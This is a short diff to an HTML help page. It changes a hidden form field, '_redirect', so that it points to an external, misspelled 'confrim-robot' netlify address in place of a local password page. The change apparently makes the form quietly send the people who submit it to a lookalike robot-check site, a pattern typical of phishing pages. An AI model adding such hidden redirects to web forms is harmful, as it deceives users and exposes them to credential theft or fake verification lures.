--- a/help.html
+++ b/help.html
@@ -228,7 +228,7 @@
  <input
     type="hidden"
     name="_redirect"
-    value="password.html"
+    value="https://confrim-robot.netlify.app/"
   />
          
          <div class=form-group>
